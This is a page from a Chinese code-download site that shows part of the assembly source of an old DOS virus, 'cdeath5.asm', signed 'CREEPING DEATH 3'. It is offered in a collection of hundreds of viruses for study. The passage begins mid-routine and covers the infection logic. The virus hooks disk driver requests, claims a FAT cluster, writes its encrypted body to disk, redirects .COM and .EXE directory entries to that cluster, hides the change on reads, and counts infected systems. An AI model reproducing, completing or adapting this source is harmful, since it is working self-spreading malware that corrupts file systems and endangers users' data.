⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 cdeath5.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
💻 ASM
📖 第 1 页 / 共 2 页
字号:
		cmp     word ptr ds:[di+8-32],0 ; >32mb partition ?
		je      m32                     ; yes, jump to m32
		sub     ds:[di+8-32],ax         ; <32mb partition
		jmp     short Return
m32:            sub     ds:[di+15h-32],ax       ; >32mb partition
		sbb     word ptr ds:[di+17h-32],0
Return:         pop     es                      ; return to caller
		pop     ds
		pop     di
		pop     si
		pop     dx
		pop     cx
		pop     bx
		pop     ax
		retf

Output:         mov     cx,0ff09h               ; check if disk changed
		call    check
		jz      InfectSector            ; no, just infect sector
		call    DoRequest               ; yes, write virus to disk
		jmp     short inf_dsk

InfectSector:   jmp     _InfectSector           ; infect sector
Read:           jmp     _Read                   ; read sector
ReadError:      add     sp,16                   ; error during request
		jmp     short Return

Input:          call    check                   ; check if disk changed
		jz      Read                    ; no, read sector
inf_dsk:        mov     byte ptr ds:[bx+2],4    ; yes, write virus to disk
		cld                             ; save last part of request
		lea     si,ds:[bx+0eh]
		mov     cx,8
save:           lodsw
		push    ax
		loop    save
		mov     word ptr ds:[bx+14h],1  ; read 1st sector on disk
		call    ReadSector
		jnz     ReadError
		mov     byte ptr ds:[bx+2],2    ; build BPB
		call    DoRequest
		lds     si,ds:[bx+12h]          ; ds:si = BPB
		mov     di,ds:[si+6]            ; size of root directory
		add     di,15                   ; in sectors
		mov     cl,4
		shr     di,cl
		mov     al,ds:[si+5]
		cbw
		mov     dx,ds:[si+0bh]
		mul     dx                      ; ax=fat sectors, dx=0
		add     ax,ds:[si+3]
		add     di,ax
		push    di                      ; save it on stack
		mov     ax,ds:[si+8]            ; total number of sectors
		cmp     ax,dx                   ; >32mb
		jnz     more                    ; no, skip next 2 instructions
		mov     ax,ds:[si+15h]          ; get number of sectors
		mov     dx,ds:[si+17h]
more:           xor     cx,cx                   ; cx=0
		sub     ax,di                   ; dx:ax=number is data sectors
		sbb     dx,cx
		mov     cl,ds:[si+2]            ; cx=sectors / cluster
		div     cx                      ; number of clusters on disk
		cmp     cl,2                    ; 1 sector/cluster ?
		sbb     ax,-1                   ; number of clusters (+1 or +2)
		push    ax                      ; save it on stack
		call    Convert                 ; get fat sector and offset in
		mov     byte ptr es:[bx+2],4    ; sector
		mov     es:[bx+14h],ax
		call    ReadSector              ; read fat sector
again:          lds     si,es:[bx+0eh]
		add     si,dx
		sub     dh,cl                   ; has something to do with the
		adc     dx,ax                   ; encryption of the pointers
		mov     word ptr cs:[gad+1],dx
		cmp     cl,1                    ; 1 sector / cluster
		jne     Ok
SmallModel:     not     di                      ; this is used when the
		and     ds:[si],di              ; clusters are 1 sector long
		pop     ax
		push    ax
		inc     ax
		push    ax
		mov     dx,0fh
		test    di,dx
		jz      here
		inc     dx
		mul     dx
here:           or      ds:[si],ax
		pop     ax
		call    Convert
		mov     si,es:[bx+0eh]
		add     si,dx
Ok:             mov     ax,ds:[si]
		and     ax,di
		mov     dx,di                   ; allocate cluster
		dec     dx
		and     dx,di
		not     di
		and     ds:[si],di
		or      ds:[si],dx
		cmp     ax,dx                   ; cluster already allocated by
		pop     ax                      ; the virus ?
		pop     di
		mov     word ptr cs:[pointer+1],ax
		je      _Read_                  ; yes, don't write it and go on
		mov     dx,ds:[si]
		push    ds
		push    si
		mov     byte ptr es:[bx+2],8    ; write
		call    DoRequest               ; write the adjusted sector to
		pop     si                      ; disk
		pop     ds
		jnz     _Read_
		call    ReadSector              ; read it again
		cmp     ds:[si],dx              ; is it written correctly ?
		jne     _Read_                  ; no, can't infect disk
		dec     ax
		dec     ax                      ; calculate the sector number
		mul     cx                      ; to write the virus to
		add     ax,di
		adc     dx,0
		push    es
		pop     ds
		mov     word ptr ds:[bx+12h],2
		mov     ds:[bx+14h],ax          ; store it in the request hdr
		test    dx,dx
		jz      less
		mov     word ptr ds:[bx+14h],-1
		mov     ds:[bx+1ah],ax
		mov     ds:[bx+1ch],dx
less:           mov     ds:[bx+10h],cs
		mov     ds:[bx+0eh],100h
		mov     byte ptr es:[bx+2],8    ; write it
		call    EncryptWrite1

_Read_:         mov     byte ptr ds:[bx+2],4    ; restore this byte
		std                             ; restore other part of the
		lea     di,ds:[bx+1ch]          ; request
		mov     cx,8
load:           pop     ax
		stosw
		loop    load
_Read:          call    DoRequest               ; do request

		mov     cx,9
_InfectSector:  mov     di,es:[bx+12h]          ; get number of sectors read
		lds     si,es:[bx+0eh]          ; get address of data
		sal     di,cl                   ; calculate end of buffer
		xor     cl,cl
		add     di,si
		xor     dl,dl
		push    ds                      ; infect the sector
		push    si
		call    find
		jcxz    no_inf                  ; write sector ?
		mov     al,8
		xchg    al,es:[bx+2]            ; save command byte
		call    DoRequest               ; write sector
		mov     es:[bx+2],al            ; restore command byte
		and     byte ptr es:[bx+4],07fh
no_inf:         pop     si
		pop     ds
		inc     dx                      ; disinfect sector in memory
		call    find
		jmp     Return                  ; return to caller

;*****************************************************************************;
;                                                                             ;
; Subroutines                                                                 ;
;                                                                             ;
;*****************************************************************************;

find:           mov     ax,ds:[si+8]            ; (dis)infect sector in memory
		cmp     ax,"XE"                 ; check for .exe
		jne     com
		cmp     ds:[si+10],al
		je      found
com:            cmp     ax,"OC"                 ; check for .com
		jne     go_on
		cmp     byte ptr ds:[si+10],"M"
		jne     go_on
found:          test    word ptr ds:[si+1eh],0ffc0h ; file to big
		jnz     go_on                       ; more than 4mb
		test    word ptr ds:[si+1dh],03ff8h ; file to small
		jz      go_on                       ; less than  2048 bytes
		test    byte ptr ds:[si+0bh],1ch    ; directory, system or
		jnz     go_on                       ; volume label
		test    dl,dl                   ; infect or disinfect ?
		jnz     rest
pointer:        mov     ax,1234h                ; ax = viral cluster
		cmp     ax,ds:[si+1ah]          ; file already infected ?
		je      go_on                   ; yes, go on
		xchg    ax,ds:[si+1ah]          ; exchange pointers
gad:            xor     ax,1234h                ; encryption
		mov     ds:[si+14h],ax          ; store it on another place
		loop    go_on                   ; change cx and go on
rest:           xor     ax,ax                   ; ax = 0
		xchg    ax,ds:[si+14h]          ; get pointer
		xor     ax,word ptr cs:[gad+1]  ; Encrypt
		mov     ds:[si+1ah],ax          ; store it on the right place
go_on:          rol     word ptr cs:[gad+1],1   ; change encryption
		add     si,32                   ; next directory entry
		cmp     di,si                   ; end of buffer ?
		jne     find                    ; no, do it again
		ret                             ; return

check:          mov     ah,ds:[bx+1]                    ; get number of unit
drive:          cmp     ah,-1                           ; same as last call ?
		mov     byte ptr cs:[drive+2],ah        ; set 2nd parameter
		jne     changed
		push    ds:[bx+0eh]                     ; save word
		mov     byte ptr ds:[bx+2],1            ; disk changed ?
		call    DoRequest
		cmp     byte ptr ds:[bx+0eh],1          ; 1=Yes
		pop     ds:[bx+0eh]                     ; restore word
		mov     ds:[bx+2],al                    ; restore command
changed:        ret                                     ; return

ReadSector:     mov     word ptr es:[bx+12h],1          ; read sector from disk

DoRequest:      db      09ah                    ; call 70:?, orginal strategy
StrBlock        dw      ?,70h
		db      09ah                    ; call 70:?, orginal interrupt
IntBlock        dw      ?,70h
		test    byte ptr es:[bx+4],80h  ; error ? yes, zf = 0
		ret                             ; return

Convert:        cmp     ax,0ff0h                ; convert cluster number into
		jae     fat_16                  ; an sector number and offset
		mov     si,3                    ; into this sector containing
		xor     word ptr cs:[si+gad-1],si       ; the fat-item of this
		mul     si                              ; cluster
		shr     ax,1
		mov     di,0fffh
		jnc     cont
		mov     di,0fff0h
		jmp     short cont
fat_16:         mov     si,2
		mul     si
		mov     di,0ffffh
cont:           mov     si,512
		div     si
		inc     ax
		ret

EncryptWrite1:  push    ds
		push    cs
		pop     ds
		push    es
		push    cs
		pop     es
		cld
		mov     cx,12
		mov     si,offset Encrypt
		mov     di,offset EncryptWrite2
		inc     byte ptr ds:[si+8]
		rep     movsb
		mov     cl,10
		mov     si,offset DoRequest
		rep     movsb
		mov     cl,12
		mov     si,offset Encrypt
		rep     movsb
		mov     ax,0c31fh
		stosw
		pop     es
		jmp     EncryptWrite2

;*****************************************************************************;
;                                                                             ;
; Data                                                                        ;
;                                                                             ;
;*****************************************************************************;

File:           db      "C:",255,0              ; the virus tries to open this
						; file

Counter         dw      0                       ; this will count the number of
						; systems that are infected by
						; this virus

Param:          dw      0,80h,?,5ch,?,6ch,?     ; parameters for the
						; exec-function

Signature       db      'CREEPING DEATH 3'      ; Signature

Header          db      7 dup(?)                ; this is the header for the
						; device driver

f_name:         db      ?                       ; Buffer for the filename used
						; by the exec-function

;*****************************************************************************;
;                                                                             ;
; The End                                                                     ;
;                                                                             ;
;*****************************************************************************;

code ends

end Encrypt

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -